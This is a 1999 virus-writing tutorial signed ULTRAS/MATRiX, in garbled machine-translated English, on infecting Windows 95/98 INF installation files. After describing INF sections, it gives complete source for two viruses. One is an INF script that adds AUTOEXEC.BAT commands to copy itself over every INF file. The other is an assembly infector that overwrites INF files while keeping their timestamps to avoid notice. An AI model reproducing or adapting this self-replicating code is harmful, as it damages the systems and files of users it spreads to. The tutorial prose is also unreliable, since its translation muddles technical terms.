inf.gif (3967 bytes)
 

So infection inf of files, in this clause I shall describe some methods and teams inf of files all that I could find and that I have made.

[ The description ]

The Inf-files represent instalation files consisting of several sections. Each section is intended for performance certain of a task.

[ The brief description of some teams ]

[Name] - the Square brackets are used designations of a beginning of the new unit.

; - Comment in inf files

Signature = $Chicago $ - Sets operational system for inf of files.On the moment a spelling the code name Win95 was the following: Chicago.

CopyFile - Contains the information necessary for copying of the specified fileor files in the catalogue. You can give system the instruction(indication) to copy a separate file. For this purpose before have of a file it is necessary to include a symbol. Thus the file will be copied in the catalogue DefaultDestDir, certain(determined) in section DestinationDir in inf files.
 

RenFile - Allows to rename specified a file.

DelFile - Allows to remove specified a file.

AddReg - Allows to specify turn-key or meaning(importance), which is required  to be added in the register.

DelReg - Allows to specify turn-key or meaning(importance), which are required to be removed from the register.

UpdateAutoBat - In this section there are teams, which modify a file autoexec.bat.

DefaultDestDir - Allows to specify the catalogue - receiver.

Reboot aka Restart - Teams causing reboot systems or restart of the machine after end of virus installation.

UpdateAutoBat
=-=-=-=-=-=-=

CmdDelete - Specifies command, which should be removed from a file autoexec.bat. This line is processed before a line CmdAdd.

CmdAdd - Specifies a team, which is required to be added in a file autoexec.bat.

DestinationDirs
=-=-=-=-=-=-

00 - in the current catalogue?
01 - initial disk name:\way
04 - catalogue backup?
10 - catalogue Windows
11 - catalogue System
12 - catalogue Iosybsys
13 - catalogue Command?
14 - catalogue Control Panel
15 - catalogue Printers
16 - catalogue Workgroup?
17 - catalogue Inf
18 - catalogue Help
20 - catalogue Fonts?
21 - catalogue Viewers?
22 - catalogue VMM32?
26 - catalogue Winboot
28 - catalogue Winboot host
30 - root catalogue loading device
32 - root catalogue with the former version windows? (if is)
33 - root catalogue with the former version ms-dos? (if is)

AddReg and DelReg
=-=-=-=-=-=-=-=-

Section [Add Registry] allows to add in the register keys and meanings (importance). Besides there is a unessential opportunity to establish actual meaning(importance). A name of the unit [add_registry section] should be given by an element AddReg of the unit [ClassInstall] either [Install] or [DefaultInstall].

Section [Delete Registry] is used for removal(distance) from the register turn-keys and names of meanings(importance).

CopyFiles
=-=-=-=-

For an element CopyFiles the following syntax is used. Parameters sourcefile and temporaryFile.

RenFiles
=-==-=

For an element CopyFiles the following syntax is used. Parameters newfile and oldfile the inclusion of any quantity(amount) of elements is supposed.

DelFiles
=-=-=-=

For an element CopyFiles the following syntax is used. Parameters filename. Set of examples you can to find in windows/inf the catalogue.

Examples
~~~~~~

So we shall proceed(pass) to a spelling of viruses for inf of files. 2 examples inf of viruses first on inf scripts, second on asm are below described. At once I want to tell what to write parasite inf a virus in general or nearly so not probably.

-[f0jar.inf]- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

;The description
;***************

;Script-virus infecting an install INF-file Windows. At installation of the
;software by a standard way Windows searches a INF-file, processes it(him) and
;carries out the script-instructions. Virus script at activization creates in
;the root catalogue of a disk About a file with a name f0jer.sys, copies in him
;(it) the file - carrier (infected INF-file) and finishes in the end of a file
;AUTOEXEC.BAT some teams DOS. These teams at next reboot Windows search in the
;catalogue windows\system and on the current disk for a *.INF-file and enters
;the name instead of him(it).

;Code of a virus
;***************

; f0jar by ULTRAS
[version]
signature = "$CHICAGO$"         ; signature win95/98
SetupClass=BASE

[DefaultInstall]
CopyFiles = Ultra.File ; copying of files in section Ultra.file
UpdateAutoBat = Patch.It     ; record in autoexec.bat in section Patch.it

[Patch.it]             ; let's remove teams in autoexec.bat
CmdDelete = "@ctty", "nul"
CmdDelete = "for", " %% b in (%windir%\system\*.inf *.inf) do copy f0jer.sys %% b "
CmdDelete = "ctty", "con"
                ; let's write down teams in autoexec.bat
CmdAdd = "@ctty", "nul"
CmdAdd = "for", " %% b in (%windir%\system\*.inf *.inf) do copy f0jer.sys %% b "
CmdAdd = "ctty", "con"

[DestinationDirs]
DefaultDestDir = 30         ; the root catalogue loading device

[SourceDisksNames]
1 = "ULTRAS", " ", 1

[ Ultra. File]             ; we copy from ultras.inf in f0jer.inf
f0jer.sys, ultras.inf

So example 2. Infection inf of files on asm, the virus was written very quickly
so it(he) can contain mistakes.

-[z0x.asm]- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
 

; Z0x.INF - Exemple INF infector on asm
; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
; this virus infects install INF-files Windows. At installation; the software
; by a standard way Windows searches a INF-file, processes it(him) and carries
; out the script-instructions. Virus script at of activization creates in the
; root catalogue of a disk About a file with a name z0x.sys, copies in him(it)
; the file - carrier (infected INF-file) and finishes in the
; end a file AUTOEXEC.BAT some teams DOS. These teams at loading Windows rename
; a file z0x.sys in z0x.com also start it(him). A file B.COM is carried out as
; an ordinary COM-file.

.model tiny
.code
org 100h
start:
db ';', 0 ; infection marker
jmp v_start ; jmp virus start
idz db 'U', 0 ; infection marker
db 13,10
db 13,10
db '[version]',13,10
db 'signature="$CHICAGO$"',13,10 ;signature win95/98
db 'SetupClass=BASE',13,10
db 13,10
db '[DefaultInstall]',13,10
db 'CopyFiles = Ultra.File',13,10 ; copying of files in section Ultra.file
db 'UpdateAutoBat = Patch.It',13,10 ; record in autoexec.bat in section Patch.it
db 13,10
db '[Patch.it]',13,10
db 'CmdDelete = "@ctty", "null"',13,10
db 'CmdDelete = "ren", "z0x.sys z0x.com"',13,10
db 'CmdDelete = "@", "z0x.com"',13,10
db 'CmdDelete = "ctty", "con"',13,10
db 13,10
db 'CmdAdd = "@ctty", "null"',13,10
db 'CmdAdd = "ren", "z0x.sys z0x.com"',13,10
db 'CmdAdd = "@", "z0x.com"',13,10
db 'CmdAdd = "ctty", "con"',13,10
db 13,10
db '[DestinationDirs]',13,10
db 'DefaultDestDir = 30',13,10    ; The root catalogue of the loading device
db 13,10
db '[SourceDisksNames]',13,10
db '1="ULTRAS","",1',13,10
db 13,10
db '[Ultra.File]',13,10
db 'z0x.sys, ultras.inf',13,10 ; We copy from ultras.inf in z0x.sys
db 13,10
db ";"
v_start:
mov max_inf,0
get_dir:
mov ah,47h
lea si,old_dir
xor dl,dl
int 21h
find_:
lea dx,filemask
call find_file
return:
cmp max_inf,9
jae quit
mov ah,3bh
lea dx,dot_dot
int 21h
jnc find_
quit:
mov ah,3bh
lea dx,old_dir
int 21h
int 20h
find_file:
mov ah,4eh
mov cx,7
find_it:
int 21h
jc return
mov dx,9eh
get_attributes:
mov ax,4300h
int 21h
mov file_at,cx
set_attributes:
mov ax,4301h
xor cx,cx
int 21h
open_file:
mov ax,3d02h
int 21h
xchg bx,ax
get_time_date:
mov ax,5700h
int 21h
push cx
push dx
check:
mov ah,3fh
lea dx,buff
mov cx,4
int 21h
cmp byte ptr [buff+5],'U'
je close_file
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
write_virus:
mov ah,40h
mov cx,_end-start
lea dx,start
int 21h
inc max_inf
restore_date_time:
mov ax,5701h
pop dx
pop cx
int 21h
close_file:
mov ah,3eh
int 21h
mov cx,file_at
mov dx,9eh
mov ax,4301h
int 21h
cmp max_inf,9
jne find_next
jmp quit
find_next:
mov ah,4fh
jmp find_it
filemask db '*.inf',0
dot_dot db '..',0
virus_name db 'Z0x by [U]',0
virz equ _end-offset start
_end:
max_inf db ?
file_at dw ?
buff db 6 dup(?)
old_dir db 64 dup(?)
end start

;ULTRAS/MATRiX 1999